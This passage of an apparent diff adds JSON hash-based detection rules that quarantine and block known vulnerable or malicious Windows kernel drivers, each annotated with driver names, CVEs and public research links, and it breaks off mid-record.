+ "id": "ba86d04e-c59c-5e3f-a520-e85ac1cfa5bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614921Z",
+ "creation_date": "2026-03-23T11:45:29.614923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614928Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0bd1ae72aeb5f3eabf1531a635f990e5eaae7fdd560342f915f723766c80889",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ba8962cc-67c0-55c6-8471-db6ff24ea846",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820581Z",
+ "creation_date": "2026-03-23T11:45:30.820583Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820589Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d3347c93dff62eecdde22ccc6ba3ce8c0446874738488527ea76d0645341409",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "baa2ad79-d2d2-5410-b99e-3bed74860950",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474321Z",
+ "creation_date": "2026-03-23T11:45:31.474325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474334Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb84b21bf29dd29ba121b45653c998984a3c39a8c9cfda04932aeb6d91cd77d7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "babeea83-195d-53a5-8939-98c1a7b677b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478635Z",
+ "creation_date": "2026-03-23T11:45:30.478639Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd628061d6e53f3f0b44f409ad914b3494c5d7b5ff6ff0e8fc3161aacec93e96",
+ "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bac5b704-595a-5d81-a6c2-cf10fb1e9d68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494619Z",
+ "creation_date": "2026-03-23T11:45:31.494621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494627Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04a3a31b33be0f29a9b291591db1a53dc8cbcd1a272c999f161f332acf93c7d6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bacd9290-5194-519b-8f8f-8975173b14d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473203Z",
+ "creation_date": "2026-03-23T11:45:31.473208Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25cd2b80f1440852e73b38aaefa23257d8f806eb7b1449d81cb6443e9b8fe39b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bad12054-2ab6-5c92-883c-d95f57c33db0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457216Z",
+ "creation_date": "2026-03-23T11:45:30.457219Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afc1873543735d6299543d91d7c09ee1fa1588ff9f131ba4aedcd32b984c8ec1",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "badcf67a-2949-590f-8a34-cf6e75d3409a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492390Z",
+ "creation_date": "2026-03-23T11:45:31.492392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492398Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "213ab0806c1ba92b72d59fdd90f9bb3bfe55611ac92d35ffbab172e5b1421dde",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bae1dfb8-a483-56fa-97f3-e4b784dac231",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976500Z",
+ "creation_date": "2026-03-23T11:45:29.976502Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976507Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c31a9fbf833b732b5f3f06c31e200994a65ce187260e66eff62278660dba4ef",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bae3819f-dfd8-58c7-8bdb-5a0de63b03f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454793Z",
+ "creation_date": "2026-03-23T11:45:30.454796Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454805Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f7d72d22cd4ad3e44fd617bdb4c90b9a884f4eb045688c0e3fb64dd33e033eaa",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotrpg.Sys) [https://www.loldrivers.io/drivers/ebdde780-e142-44e7-a998-504c516f4695/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bae7bc1a-588b-537c-91b7-2abf3965733e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477260Z",
+ "creation_date": "2026-03-23T11:45:30.477263Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477272Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1228d0b6b4f907384346f64e918cc28021fe1cd7d4e39687bca34a708998261a",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "baea4a00-cf18-502b-bfac-52951b683e81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984424Z",
+ "creation_date": "2026-03-23T11:45:29.984426Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984431Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d5cc046c2ae9ba6fe54def699f1c4fa92d3226304321bbf45cc33883ce131138",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "baf0918f-bea7-5fbf-9977-5e13671583b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612915Z",
+ "creation_date": "2026-03-23T11:45:29.612917Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612922Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0483b32f9544e9c3cc3f206e7bc983ea83f5a9ca44864f2af9b8fc10ff45949f",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb01abf2-b845-5e38-9a8b-29b3b3fb87a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459104Z",
+ "creation_date": "2026-03-23T11:45:30.459107Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459114Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65a3e69854c729659281d2c5f8a4c8274ad3606befdcd9e1b79d3262f260bfa1",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb01e362-6e05-5e46-aa7f-ead50304ebf3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975360Z",
+ "creation_date": "2026-03-23T11:45:29.975362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975368Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "001cd8b2ce1932d1a8c32bc2d643ee4fa6f67626d1b6895beea916285450566c",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb0cbf95-c47e-5840-bfba-a5747914b40b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822078Z",
+ "creation_date": "2026-03-23T11:45:31.822082Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74020c03e63a367cf16e08644a2f7427704312c219c3d7b8f84c549059bfddb0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb13ceb8-daed-5eb1-9fdb-217983682499",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480674Z",
+ "creation_date": "2026-03-23T11:45:30.480677Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480686Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc23abdcf93928e1db8401a7ff53c86c85230a8637c4168f7434208f9e8b5ded",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb13d187-132c-5349-b65d-717b4c7828e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159517Z",
+ "creation_date": "2026-03-23T11:45:31.159519Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e3627239b09b34f1fc404f536b1599e3d27eecdac4c14129f7babeea25214ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb1e75f5-b6fb-57a0-b769-4ed7be50140d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984711Z",
+ "creation_date": "2026-03-23T11:45:29.984713Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4",
+ "comment": "Dangerous Physmem Kernel Driver (aka asmmap.Sys) [https://www.loldrivers.io/drivers/d0048840-970f-4ad5-9a07-1d39469d721f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb262c08-cfb5-561e-82ef-98ecb723d25f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969751Z",
+ "creation_date": "2026-03-23T11:45:29.969753Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969758Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29a560a11292c4224a401392e091a8f08230fdfea35521035e2bfda0b3d1f952",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb26968d-afdf-5fc3-997c-c7e49f5817d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825504Z",
+ "creation_date": "2026-03-23T11:45:30.825506Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "157f9f36041dbc09548cd87687995d9e8b9b30a80fc7e9bad6d8cfa943489d3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb2e5d51-f2ef-503a-8c98-1cdd3094481d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621106Z",
+ "creation_date": "2026-03-23T11:45:29.621108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621114Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "119c48b79735fda0ecd973d77d9bdc6b329960caed09b38ab454236ca039d280",
+ "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bb381b37-eb0f-56f0-8ab0-f3ff9a1fa717",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
